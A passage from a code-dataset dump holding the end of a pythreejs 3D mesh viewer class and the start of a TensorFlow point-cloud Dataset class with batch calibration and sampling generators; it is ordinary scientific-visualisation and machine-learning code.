self.renderer.width,\n 'targetDepth' : np.linalg.norm(np.array(self.cam.position) - np.array(self.controls.target)),\n 'arrowAlignment': self.vectorField.align.getRelativeOffset()}\n\n @property\n def arrowSize(self):\n return self._arrowSize\n\n @arrowSize.setter\n def arrowSize(self, value):\n self._arrowSize = value\n if (self.arrowMaterial is not None):\n self.arrowMaterial.updateUniforms(**self._arrowMaterialUniforms())\n @property\n def arrowMaterial(self):\n if (self.superView is None): return self._arrowMaterial\n else: return self.superView.arrowMaterial\n\n @arrowMaterial.setter\n def arrowMaterial(self, arrowMat):\n if (self.superView is None): self._arrowMaterial = arrowMat\n else: self.superView.arrowMaterial = arrowMat\n\n def showWireframe(self, shouldShow = True):\n if shouldShow:\n if self.wireframeMesh is None:\n # The wireframe shares geometry with the current mesh, and should automatically be updated when the current mesh is...\n self.wireframeMesh = pythreejs.Mesh(geometry=self.currMesh.geometry, material=self.wireframeMaterial())\n if self.wireframeMesh not in self.meshes.children:\n self.meshes.add(self.wireframeMesh)\n else: # hide\n if self.wireframeMesh in self.meshes.children:\n self.meshes.remove(self.wireframeMesh)\n self.shouldShowWireframe = shouldShow\n\n def showPoints(self, shouldShow=True, size=5):\n if shouldShow:\n if self.pointsMesh is None:\n # The points \"mesh\" shares geometry with the current mesh, and should automatically be updated when the current mesh is...\n self.pointsMesh = pythreejs.Points(geometry=self.currMesh.geometry, material=self.pointsMaterial())\n if self.pointsMesh not in self.meshes.children:\n self.meshes.add(self.pointsMesh)\n else: # hide\n if self.pointsMesh in self.meshes.children:\n self.meshes.remove(self.pointsMesh)\n if (self.cachedPointsMaterial is not None):\n self.cachedPointsMaterial.size = size\n\n def wireframeMaterial(self):\n if (self.cachedWireframeMaterial is None):\n self.cachedWireframeMaterial = self.allocateWireframeMaterial()\n return self.cachedWireframeMaterial\n\n def pointsMaterial(self):\n if (self.cachedPointsMaterial is None):\n self.cachedPointsMaterial = self.allocatePointsMaterial()\n return self.cachedPointsMaterial\n\n # Allocate a wireframe material for the mesh; this can be overrided by, e.g., mode_viewer\n # to apply different settings.\n def allocateWireframeMaterial(self):\n return pythreejs.MeshBasicMaterial(color='black', side='DoubleSide', 
wireframe=True)\n\n # Allocate a wireframe material for the mesh; this can be overrided by, e.g., mode_viewer\n # to apply different settings.\n def allocatePointsMaterial(self):\n return pythreejs.PointsMaterial(color='black', size=5, sizeAttenuation=False)\n\n def getCameraParams(self):\n return (self.cam.position, self.cam.up, self.controls.target)\n\n def setCameraParams(self, params):\n self.cam.position, self.cam.up, self.controls.target = params\n self.cam.lookAt(self.controls.target)\n\n def show(self):\n return self.renderer\n\n def resize(self, width, height):\n self.renderer.width = width\n self.renderer.height = height\n\n def getSize(self):\n return (self.renderer.width, self.renderer.height)\n\n def exportHTML(self, path):\n import ipywidget_embedder\n ipywidget_embedder.embed(path, self.renderer)\n\n def writeScreenshot(self, path):\n if not hasattr(self, 'screenshotWriter'):\n self.screenshotWriter = ScreenshotWriter(self.renderer)\n self.screenshotWriter.capture(path)\n\n def offscreenRenderer(self, width = None, height = None, scale = None):\n import OffscreenRenderer\n if scale is not None:\n if width is not None or height is not None:\n raise Exception('Specifying `scale` and `width` or `height` are mutually exclusive')\n width = self.renderer.width * scale\n height = self.renderer.height * scale\n if width is None: width = self.renderer.width\n if height is None: height = self.renderer.height\n mr = OffscreenRenderer.MeshRenderer(width, height)\n self.__addOffscreenRendererObjects(mr)\n\n mr.setCameraParams(self.getCameraParams())\n for m in mr.meshes: m.modelMatrix(self.objects.position, self.objects.scale, self.objects.quaternion)\n mr.perspective(50, width / height, 0.1, 2000)\n\n mr.specularIntensity[:] = 0.0 # Our viewer currently doesn't have any specular highlights\n return mr\n\n def antialiasedImage(self, renderScale=2, outputScale=1):\n orender = self.offscreenRenderer(scale=renderScale)\n for m in orender.meshes:\n m.lineWidth *= renderScale\n orender.render()\n return orender.scaledImage(outputScale / renderScale)\n\n def __addOffscreenRendererObjects(self, mr):\n \"\"\"\n Recursively add the meshes of `self` *and its subviews* to the\n offscreen mesh renderer `mr`.\n \"\"\"\n if (not self.isPointCloud):\n mainMesh = self.meshes.children[0]\n attr = mainMesh.geometry.attributes\n P = attr['position'].array\n N = attr['normal'].array\n C = attr['color'].array if 'color' in attr else mainMesh.material.color\n F = attr['index'].array if 'index' in attr else None\n mr.addMesh(P, F, N, C, makeDefault=False)\n\n mr.meshes[-1].alpha = mainMesh.material.opacity\n mr.meshes[-1].lineWidth = 0.75 if ((self.wireframeMesh is not None) and (self.wireframeMesh in self.meshes.children)) else 0.0\n\n if self.vectorFieldMesh is not None:\n vga = self.vectorFieldMesh.geometry.attributes\n amu = self._arrowMaterialUniforms()\n mr.addVectorFieldMesh(vga['position'].array, vga[ 'index'].array, vga[ 'normal'].array,\n vga['arrowPos'].array, vga['arrowVec'].array, vga['arrowColor'].array,\n amu['arrowSizePx_x'] / amu['rendererWidth'], amu['arrowAlignment'], amu['targetDepth'])\n\n for gm in self.ghostMeshes.children:\n attr = gm.geometry.attributes\n P = attr['position'].array\n N = attr['normal'].array\n C = attr['color'].array if 'color' in attr else self.materialLibrary.ghostMaterial(self.materialLibrary.material(False), self.ghostColor).color\n F = attr['index'].array if 'index' in attr else None\n mr.addMesh(P, F, N, C, makeDefault=False)\n mr.meshes[-1].alpha = 0.25\n 
mr.meshes[-1].lineWidth = 1.0 if ((self.wireframeMesh is not None) and (self.wireframeMesh in self.meshes.children)) else 0.0\n\n # Recursively add subviews\n for sv in self.subViews:\n sv.__addOffscreenRendererObjects(mr)\n\n def transformModel(self, position, scale, quaternion):\n self.objects.scale = [scale] * 3\n self.objects.position = tuple(position)\n self.objects.quaternion = quaternion\n\n def setDarkMode(self, dark=True):\n if (dark):\n self.renderer.scene.background = '#111111'\n self.materialLibrary.material(False).color = '#F49111' # 'orange'\n self.wireframeMaterial().color = 'black' # '#220022'\n else:\n self.renderer.scene.background = '#FFFFFF'\n self.materialLibrary.material(False).color = '#D3D3D3' # 'light gray'\n self.wireframeMaterial().color = 'black'\n\n def highlightTriangles(self, tris):\n \"\"\"\n Add a subview highlighting a triangle or list of triangles.\n \"\"\"\n if isinstance(tris, int):\n tris = np.array([tris], dtype=np.int64) # np.int was removed from NumPy; use an explicit integer dtype\n submesh = mesh_operations.removeDanglingVertices(self.mesh.vertices(), self.mesh.triangles()[tris])\n subview = TriMeshViewer(submesh, superView=self)\n subview.showPoints()\n self.subViews.append(subview)\n\n def clearSubviews(self):\n for s in self.subViews:\n if s.superView != self: raise Exception('subview-superview relationship disagreement')\n self.objects.remove([s.meshes, s.ghostMeshes])\n s.superView = -1 # subview has been divorced from its superview\n self.subViews = []\n\n def removeSubview(self, subview):\n if subview not in self.subViews: return # raise Exception('subview does not exist')\n self.objects.remove([subview.meshes, subview.ghostMeshes])\n self.subViews.remove(subview)\n\n def __cleanMeshes(self, meshGroup):\n meshes = list(meshGroup.children)\n for oldMesh in meshes:\n meshGroup.remove(oldMesh)\n\n # Note: the wireframe mesh shares geometry with the current mesh;\n # avoid a double close.\n if ((oldMesh != self.wireframeMesh) and (oldMesh != self.pointsMesh)):\n oldMesh.geometry.exec_three_obj_method('dispose')\n for k, attr in oldMesh.geometry.attributes.items():\n attr.close()\n oldMesh.geometry.close()\n\n oldMesh.close()\n\n def __del__(self):\n # Clean up resources\n self.__cleanMeshes(self.ghostMeshes)\n\n if ((self.superView is not None) and (self.superView != -1)):\n self.superView.removeSubview(self)\n\n # If vectorFieldMesh, wireframeMesh, or pointsMesh exist but are hidden, add them to the meshes group for cleanup\n for m in [self.vectorFieldMesh, self.wireframeMesh, self.pointsMesh]:\n if (m is not None) and (m not in self.meshes.children):\n self.meshes.add(m)\n self.__cleanMeshes(self.meshes)\n\n if (self.cachedWireframeMaterial is not None): self.cachedWireframeMaterial.close()\n if (self.cachedPointsMaterial is not None): self.cachedPointsMaterial.close()\n\n # Also clean up our stashed buffer attributes (these are guaranteed not\n # to be attached to the geometry that was already cleaned up).\n for k, v in self.bufferAttributeStash.items():\n v.close()\n\n if self.superView is None:\n # We need to explicitly close the widgets we generated or they will\n # remain open in the frontend and backend, leaking memory (due to the\n # global widget registry).\n # https://github.com/jupyter-widgets/ipywidgets/issues/1345\n import ipywidget_embedder\n ds = ipywidget_embedder.dependency_state(self.renderer)\n keys = list(ds.keys())\n for k in keys:\n ipywidgets.Widget.widgets[k].close()\n\n self.renderer.close()\n", "repo_name": "MeshFEM/MeshFEM", "sub_path": "python/vis/pythreejs_viewer.py", 
"file_name": "pythreejs_viewer.py", "file_ext": "py", "file_size_in_byte": 29558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pythreejs.DataTexture", "line_number": 28, "usage_type": "call"}, {"api_name": "pythreejs.LineBasicMaterial", "line_number": 58, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 61, "usage_type": "call"}, {"api_name": "pythreejs.MeshLambertMaterial", "line_number": 64, "usage_type": "call"}, {"api_name": "pythreejs.LineBasicMaterial", "line_number": 72, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 73, "usage_type": "call"}, {"api_name": "pythreejs.MeshLambertMaterial", "line_number": 74, "usage_type": "call"}, {"api_name": "ipywebrtc.WidgetStream", "line_number": 129, "usage_type": "call"}, {"api_name": "ipywebrtc.ImageRecorder", "line_number": 130, "usage_type": "call"}, {"api_name": "jupyter_ui_poll.ui_events", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 143, "usage_type": "call"}, {"api_name": "pythreejs.Mesh", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pythreejs.Group", "line_number": 165, "usage_type": "call"}, {"api_name": "pythreejs.Group", "line_number": 166, "usage_type": "call"}, {"api_name": "pythreejs.Group", "line_number": 167, "usage_type": "call"}, {"api_name": "pythreejs.PerspectiveCamera", "line_number": 206, "usage_type": "call"}, {"api_name": "pythreejs.Scene", "line_number": 210, "usage_type": "call"}, {"api_name": "pythreejs.AmbientLight", "line_number": 210, "usage_type": "call"}, {"api_name": "pythreejs.TrackballControls", "line_number": 213, "usage_type": "call"}, {"api_name": "pythreejs.Renderer", "line_number": 218, "usage_type": "call"}, {"api_name": "pythreejs.PointLight", "line_number": 236, "usage_type": "call"}, {"api_name": "pythreejs.BufferAttribute", "line_number": 301, "usage_type": "call"}, {"api_name": "pythreejs.BufferAttribute", "line_number": 320, "usage_type": "call"}, {"api_name": "pythreejs.BufferGeometry", "line_number": 322, "usage_type": "call"}, {"api_name": "pythreejs.Mesh", "line_number": 404, "usage_type": "call"}, {"api_name": "pythreejs.Points", "line_number": 416, "usage_type": "call"}, {"api_name": "pythreejs.MeshBasicMaterial", "line_number": 438, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 443, "usage_type": "call"}, {"api_name": "ipywidget_embedder.embed", "line_number": 464, "usage_type": "call"}, {"api_name": "{'ipywebrtc': 'ipywebrtc', 'ui_events': 'jupyter_ui_poll.ui_events', 'time': 'time'}", "line_number": 468, "usage_type": "call"}, {"api_name": "OffscreenRenderer.MeshRenderer", "line_number": 480, "usage_type": "call"}, {"api_name": "ipywidget_embedder.dependency_state", "line_number": 615, "usage_type": "call"}, {"api_name": "ipywidgets.Widget", "line_number": 618, "usage_type": "attribute"}]} +{"seq_id": "71965191874", "text": "import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.insert(0, ROOT_DIR)\n\nOPS_DIR = os.path.join(ROOT_DIR, 'ops')\nsys.path.insert(0, OPS_DIR)\n\nfrom ops import get_tf_func\n\nclass Dataset(object):\n def __init__(self, config):\n self.config = config\n\n # path\n self.data_path = config.data_path if config.data_path else 'Data'\n self.data_path = f'{self.data_path}/{config.dataset}'\n # interface - init op\n 
self.train_init_op = None\n self.val_init_op = None\n self.test_init_op = None\n\n @property\n def info(self):\n return {\n 'ignored_labels': self.ignored_labels,\n 'label_names': self.label_names,\n }\n\n def valid_split(self, split, short=False):\n assert split in ['train', 'training', 'val', 'validation', 'test'], f'invalid split = {split}'\n if split.startswith('train'):\n return 'train' if short else 'training'\n elif split.startswith('val'):\n return 'val' if short else 'validation'\n else:\n return 'test'\n\n def init_labels(self):\n \"\"\"\n Initiate all label parameters given the label_to_names dict\n \"\"\"\n self.num_classes = len(self.label_to_names) - len(self.ignored_labels)\n assert self.config.num_classes == self.num_classes\n\n self.label_values = np.sort([k for k, v in self.label_to_names.items()]) # may not be consecutive or start from 0\n self.label_names = [self.label_to_names[k] for k in self.label_values]\n self.name_to_label = {v: k for k, v in self.label_to_names.items()}\n\n # original label value <-> idx of valid label\n self.label_to_idx = []\n idx = 0\n for l in self.label_values:\n while len(self.label_to_idx) < l:\n self.label_to_idx += [None] # skipped labels - not even invalid i.e. should not exists in label idx\n self.label_to_idx += [idx] if l not in self.ignored_labels else [-1]\n idx += l not in self.ignored_labels\n self.label_to_idx = np.array(self.label_to_idx)\n self.idx_to_label = np.array([l for l in self.label_values if l not in self.ignored_labels])\n\n def initialize(self, verbose=True):\n config = self.config\n # initialize op\n if config.search == 'radius':\n self.initialize_radius(verbose=verbose)\n elif config.search == 'knn':\n self.initialize_fixed_size(verbose=verbose)\n else:\n raise NotImplementedError(f'not supported methods: sampling = {config.sample}; searching = {config.search}')\n\n def initialize_radius(self, verbose=True):\n config = self.config\n self.batch_limit = self.calibrate_batches('training', config.batch_size) # max num points [BxN] of a batch - used in get_batch_gen\n self.batch_limit_val = self.calibrate_batches('validation', config.batch_size_val) if config.batch_size_val else None\n # neighbor_limits - used in base.big_neighborhood_filter => set neighbor_idx shape\n self.neighborhood_limits = config.neighborhood_limits if config.neighborhood_limits else self.calibrate_neighbors('training')\n if config.max_neighborhood_limits:\n self.neighborhood_limits = [min(i, config.max_neighborhood_limits) for i in self.neighborhood_limits]\n self.neighborhood_limits = [int(l * config.density_parameter // 5) for l in self.neighborhood_limits]\n if verbose:\n print(\"batch_limit: \", self.batch_limit)\n print(\"neighborhood_limits: \", self.neighborhood_limits)\n\n # Get generator and mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_radius('training')\n gen_function_val, _, _ = self.get_batch_gen_radius('validation')\n gen_function_test, _, _ = self.get_batch_gen_radius('test')\n kwargs = gen_function.kwargs if hasattr(gen_function, 'kwargs') else {}\n map_func = self.get_tf_mapping_radius(**kwargs)\n\n self.train_data = tf.data.Dataset.from_generator(gen_function, gen_types, gen_shapes)\n self.train_data = self.train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n # self.train_data = self.train_data.apply(tf.data.experimental.copy_to_device('/gpu:0'))\n self.train_data = self.train_data.prefetch(tf.data.experimental.AUTOTUNE)\n # self.train_data = 
self.train_data.apply(tf.data.experimental.prefetch_to_device('/gpu:0'))\n\n self.val_data = tf.data.Dataset.from_generator(gen_function_val, gen_types, gen_shapes)\n self.val_data = self.val_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.val_data = self.val_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.test_data = None\n if gen_function_test is not None:\n self.test_data = tf.data.Dataset.from_generator(gen_function_test, gen_types, gen_shapes)\n self.test_data = self.test_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.test_data = self.test_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n # create a iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(self.train_data.output_types, self.train_data.output_shapes)\n # independent stream for each gpus\n self.flat_inputs = [iter.get_next() for i in range(config.gpu_num)]\n # create the initialisation operations\n self.train_init_op = iter.make_initializer(self.train_data)\n self.val_init_op = iter.make_initializer(self.val_data)\n self.test_init_op = iter.make_initializer(self.test_data) if self.test_data is not None else None\n\n def initialize_fixed_size(self, verbose=True):\n config = self.config\n if verbose:\n print('\\n\\t'.join(['k-nn & ratio:'] + [f'{a} = {getattr(config, a)}' for a in ['kr_search', 'kr_sample', 'kr_sample_up', 'r_sample']]))\n\n # Get generator and mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_fixed_size('training')\n gen_function_val, _, _ = self.get_batch_gen_fixed_size('validation')\n gen_function_test, _, _ = self.get_batch_gen_fixed_size('test')\n map_func = self.get_tf_mapping_fixed_size()\n\n self.train_data = tf.data.Dataset.from_generator(gen_function, gen_types, gen_shapes)\n self.train_data = self.train_data.batch(config.batch_size)\n self.train_data = self.train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.train_data = self.train_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.val_data = tf.data.Dataset.from_generator(gen_function_val, gen_types, gen_shapes)\n self.val_data = self.val_data.batch(config.batch_size_val if config.batch_size_val else config.batch_size)\n self.val_data = self.val_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.val_data = self.val_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.test_data = None\n if gen_function_test is not None:\n self.test_data = tf.data.Dataset.from_generator(gen_function_test, gen_types, gen_shapes)\n self.test_data = self.test_data.batch(config.batch_size_val if config.batch_size_val else config.batch_size)\n self.test_data = self.test_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.test_data = self.test_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n # create a iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(self.train_data.output_types, self.train_data.output_shapes)\n # independent stream for each gpus\n self.flat_inputs = [iter.get_next() for i in range(config.gpu_num)]\n # create the initialisation operations\n self.train_init_op = iter.make_initializer(self.train_data)\n self.val_init_op = iter.make_initializer(self.val_data)\n self.test_init_op = iter.make_initializer(self.test_data) if self.test_data is not None else None\n\n\n def calibrate_batches(self, split=None, batch_size=None):\n s = 'training' if len(self.input_trees['training']) > 0 else 'test'\n split = split if split else s\n batch_size = batch_size if 
batch_size else self.config.batch_size\n\n N = (10000 // len(self.input_trees[split])) + 1\n sizes = []\n # Take a bunch of example neighborhoods in all clouds\n for i, tree in enumerate(self.input_trees[split]):\n # Randomly pick points\n points = np.array(tree.data, copy=False)\n rand_inds = np.random.choice(points.shape[0], size=N, replace=False)\n rand_points = points[rand_inds]\n noise = np.random.normal(scale=self.config.in_radius / 4, size=rand_points.shape)\n rand_points += noise.astype(rand_points.dtype)\n neighbors = tree.query_radius(points[rand_inds], r=self.config.in_radius)\n # Only save neighbors lengths\n sizes += [len(neighb) for neighb in neighbors]\n sizes = np.sort(sizes)\n # Higher bound for batch limit\n lim = sizes[-1] * batch_size\n # Biggest batch size with this limit\n sum_s = 0\n max_b = 0\n for i, s in enumerate(sizes):\n sum_s += s\n if sum_s > lim:\n max_b = i\n break\n # With a proportional corrector, find the batch limit that yields the wanted batch size\n estim_b = 0\n for i in range(10000):\n # Compute a random batch\n rand_shapes = np.random.choice(sizes, size=max_b, replace=False)\n b = np.sum(np.cumsum(rand_shapes) < lim)\n # Update estim_b (low-pass filter instead of a true mean)\n estim_b += (b - estim_b) / min(i + 1, 100)\n # Correct batch limit\n lim += 10.0 * (self.config.batch_size - estim_b)\n return lim\n\n def calibrate_neighbors(self, split, keep_ratio=0.8, samples_threshold=10000):\n\n # Create a tensorflow input pipeline\n # **********************************\n import time\n config = self.config\n assert split in ['training', 'test']\n\n # From config parameter, compute higher bound of neighbors number in a neighborhood\n hist_n = int(np.ceil(4 / 3 * np.pi * (config.density_parameter + 1) ** 3))\n\n # Initiate neighbors limit with higher bound\n self.neighborhood_limits = np.full(config.num_layers, hist_n, dtype=np.int32)\n\n # Init batch limit if not done\n self.batch_limit = self.batch_limit if hasattr(self, 'batch_limit') else self.calibrate_batches()\n\n # Get mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_radius(split)\n kwargs = gen_function.kwargs if hasattr(gen_function, 'kwargs') else {}\n map_func = self.get_tf_mapping_radius(**kwargs)\n\n # Create batched dataset from generator\n train_data = tf.data.Dataset.from_generator(gen_function,\n gen_types,\n gen_shapes)\n\n train_data = train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n\n # Prefetch data\n train_data = train_data.prefetch(10)\n\n # create an iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\n flat_inputs = iter.get_next()\n\n # create the initialisation operations\n train_init_op = iter.make_initializer(train_data)\n\n # Create a local session for the calibration.\n cProto = tf.ConfigProto()\n cProto.gpu_options.allow_growth = True\n with tf.Session(config=cProto) as sess:\n\n # Init variables\n sess.run(tf.global_variables_initializer())\n\n # Initialise iterator with train data\n sess.run(train_init_op)\n\n # Get histogram of neighborhood sizes in 1 epoch max\n # **************************************************\n\n neighb_hists = np.zeros((config.num_layers, hist_n), dtype=np.int32)\n t0 = time.time()\n mean_dt = np.zeros(2)\n last_display = t0\n epoch = 0\n training_step = 0\n while epoch < 1 and np.min(np.sum(neighb_hists, axis=1)) < samples_threshold:\n try:\n\n # Get next inputs\n t = [time.time()]\n ops = flat_inputs['neighbors']\n neighbors = 
sess.run(ops)\n t += [time.time()]\n\n # Update histogram\n counts = [np.sum(neighb_mat < neighb_mat.shape[0], axis=1) for neighb_mat in neighbors]\n hists = [np.bincount(c, minlength=hist_n)[:hist_n] for c in counts]\n neighb_hists += np.vstack(hists)\n t += [time.time()]\n\n # Average timing\n mean_dt = 0.01 * mean_dt + 0.99 * (np.array(t[1:]) - np.array(t[:-1]))\n\n # Console display\n if (t[-1] - last_display) > 2.0:\n last_display = t[-1]\n message = 'Calib Neighbors {:08d} : timings {:4.2f} {:4.2f}'\n print(message.format(training_step, 1000 * mean_dt[0], 1000 * mean_dt[1]))\n\n training_step += 1\n\n except tf.errors.OutOfRangeError:\n print('End of train dataset')\n epoch += 1\n\n cumsum = np.cumsum(neighb_hists.T, axis=0)\n percentiles = np.sum(cumsum < (keep_ratio * cumsum[hist_n - 1, :]), axis=0)\n\n self.neighborhood_limits = percentiles\n print('neighborhood_limits : {}'.format(self.neighborhood_limits))\n\n return\n\n\n def init_sampling(self, split):\n ############\n # Parameters\n ############\n\n # Initiate parameters depending on the chosen split\n if split == 'training': # First compute the number of point we want to pick in each cloud set - num of samples\n epoch_n = self.config.epoch_steps * self.config.epoch_batch\n elif split == 'validation':\n epoch_n = self.config.validation_steps * self.config.epoch_batch\n elif split == 'test':\n epoch_n = self.config.validation_steps * self.config.epoch_batch\n elif split == 'ERF':\n # First compute the number of point we want to pick in each cloud and for each class\n epoch_n = 1000000\n self.batch_limit = 1 # BxN = 1, single point\n np.random.seed(42)\n split = 'test'\n else:\n raise ValueError('Split argument in data generator should be \"training\", \"validation\" or \"test\"')\n\n # Initiate potentials for regular generation\n if not hasattr(self, 'potentials'):\n self.potentials = {}\n self.min_potentials = {}\n\n # Reset potentials\n self.potentials[split] = []\n self.min_potentials[split] = []\n for i, tree in enumerate(self.input_trees[split]):\n self.potentials[split] += [np.random.rand(tree.data.shape[0]) * 1e-3]\n self.min_potentials[split] += [float(np.min(self.potentials[split][-1]))]\n\n return epoch_n\n\n\n def get_batch_gen_radius(self, split):\n \"\"\"\n A function defining the batch generator for each split. 
Should return the generator, the generated types and\n generated shapes\n :param split: string in \"training\", \"validation\" or \"test\"\n :return: gen_func, gen_types, gen_shapes\n \"\"\"\n\n config = self.config\n epoch_n = self.init_sampling(split)\n data_split = split\n batch_limit = self.batch_limit\n if split != 'training' and self.batch_limit_val:\n batch_limit = self.batch_limit_val\n\n ##########################\n # Define generator functions\n ##########################\n def spatially_regular_gen():\n\n # Initiate concatenation lists\n p_list = []\n c_list = []\n pl_list = []\n pi_list = []\n ci_list = []\n\n batch_n = 0\n\n # Generator loop\n for i in range(epoch_n):\n\n # Choose the cloud with the minimum potential\n cloud_ind = int(np.argmin(self.min_potentials[split]))\n\n # Choose point ind as minimum of potentials\n point_ind = np.argmin(self.potentials[split][cloud_ind])\n\n # Get points from tree structure\n points = np.array(self.input_trees[data_split][cloud_ind].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n if split != 'ERF':\n noise = np.random.normal(scale=config.in_radius/10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n else:\n pick_point = center_point\n\n # Indices of points in input region\n input_inds = self.input_trees[data_split][cloud_ind].query_radius(pick_point,\n r=config.in_radius)[0]\n\n # Number collected\n n = input_inds.shape[0]\n\n # Update potentials (Tukey weights)\n if split != 'ERF':\n dists = np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)\n tukeys = np.square(1 - dists / np.square(config.in_radius))\n tukeys[dists > np.square(config.in_radius)] = 0\n self.potentials[split][cloud_ind][input_inds] += tukeys\n self.min_potentials[split][cloud_ind] = float(np.min(self.potentials[split][cloud_ind]))\n\n # Safety check for very dense areas - align with training setting\n if n > self.batch_limit:\n input_inds = np.random.choice(input_inds, size=int(self.batch_limit)-1, replace=False)\n n = input_inds.shape[0]\n\n # Collect points and colors\n input_points = (points[input_inds] - pick_point).astype(np.float32)\n input_colors = self.input_colors[data_split][cloud_ind][input_inds]\n if split in ['test', 'ERF']:\n input_labels = np.zeros(input_points.shape[0])\n else:\n input_labels = self.input_labels[data_split][cloud_ind][input_inds]\n input_labels = self.label_to_idx[input_labels]\n # input_labels = np.array([self.label_to_idx[l] for l in input_labels])\n\n # In case batch is full, yield it and reset it\n if batch_n + n > batch_limit and batch_n > 0:\n yield (np.concatenate(p_list, axis=0), # [BxN, 3] - xyz in sample\n np.concatenate(c_list, axis=0), # [BxN, 3/1 + 3 (RGB/intensity + global xyz in whole cloud)]\n np.concatenate(pl_list, axis=0), # [BxN] - labels\n np.array([tp.shape[0] for tp in p_list]), # [B] - size (point num) of each batch\n np.concatenate(pi_list, axis=0), # [B, N] - point idx in each of its point cloud\n np.array(ci_list, dtype=np.int32)) # [B] - cloud idx\n\n p_list = []\n c_list = []\n pl_list = []\n pi_list = []\n ci_list = []\n batch_n = 0\n\n # Add data to current batch\n if n > 0:\n p_list += [input_points]\n c_list += [np.hstack((input_colors, input_points + pick_point))]\n pl_list += [input_labels]\n pi_list += [input_inds]\n ci_list += [cloud_ind]\n\n # Update batch size\n batch_n += n\n\n if batch_n > 0:\n yield 
(np.concatenate(p_list, axis=0),\n np.concatenate(c_list, axis=0),\n np.concatenate(pl_list, axis=0),\n np.array([tp.shape[0] for tp in p_list]),\n np.concatenate(pi_list, axis=0),\n np.array(ci_list, dtype=np.int32))\n spatially_regular_gen.types = (tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32)\n spatially_regular_gen.shapes = ([None, 3], [None, 6], [None], [None], [None], [None])\n\n # Define the generator that should be used for this split\n gen_func = config.data_gen if config.data_gen else 'spatially_regular_gen'\n gen_func = {\n 'spatially_regular_gen': spatially_regular_gen,\n }[gen_func]\n gen_types = tuple(gen_func.types)\n gen_shapes = tuple(gen_func.shapes)\n if hasattr(gen_func, 'init'): # extra init\n gen_func.init(split)\n\n return gen_func, gen_types, gen_shapes\n\n def get_batch_gen_fixed_size(self, split):\n\n epoch_n = self.init_sampling(split)\n\n def spatially_regular_gen():\n # Generator loop\n for i in range(epoch_n):\n\n # Choose the cloud with the minimum potential\n cloud_ind = int(np.argmin(self.min_potentials[split]))\n\n # Choose point ind as minimum of potentials\n point_ind = np.argmin(self.potentials[split][cloud_ind])\n\n # Get points from tree structure\n points = np.array(self.input_trees[split][cloud_ind].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n noise = np.random.normal(scale=self.config.noise_init / 10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n\n # Check if the number of points in the selected cloud is less than the predefined num_points\n k = min(len(points), self.config.in_points)\n\n # Query all points / the predefined number within the cloud\n dists, input_inds = self.input_trees[split][cloud_ind].query(pick_point, k=k)\n input_inds = input_inds[0]\n\n # Shuffle index\n np.random.shuffle(input_inds)\n\n # Collect points and colors\n input_points = (points[input_inds] - pick_point).astype(np.float32)\n input_colors = self.input_colors[split][cloud_ind][input_inds]\n if split == 'test':\n input_labels = np.zeros(input_points.shape[0])\n else:\n input_labels = self.input_labels[split][cloud_ind][input_inds]\n input_labels = self.label_to_idx[input_labels]\n\n # Update potentials (Tukey weights)\n # TODO: using dist from tree query ???\n # assert np.all(np.abs(dists ** 2 - np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)) < 1e-9)\n dists = np.sum(np.square((points[input_inds] - pick_point).astype(np.float32)), axis=1)\n tukeys = np.square(1 - dists / dists.max())\n # # weighted update\n # tukeys_cls_w = class_weight[split][input_labels] if split == 'train' else 1 # per-pt class weight\n self.potentials[split][cloud_ind][input_inds] += tukeys\n self.min_potentials[split][cloud_ind] = float(np.min(self.potentials[split][cloud_ind]))\n\n # Up-sample with replacement if the cloud has fewer points than in_points\n if len(input_points) < self.config.in_points:\n dup_idx = np.random.choice(len(points), self.config.in_points - len(points))\n dup_idx = np.concatenate([np.arange(len(points)), dup_idx]) # [original, dup]\n input_points = input_points[dup_idx]\n input_colors = input_colors[dup_idx]\n input_labels = input_labels[dup_idx]\n input_inds = input_inds[dup_idx]\n\n # sampled point cloud\n yield (input_points.astype(np.float32), # centered xyz\n np.hstack([input_colors, input_points + pick_point]).astype(np.float32), # colors, original xyz\n input_labels, # label\n input_inds.astype(np.int32), # points idx in cloud\n 
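# (the order and dtypes of this yielded tuple must stay in sync with gen_types/gen_shapes below)\n 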
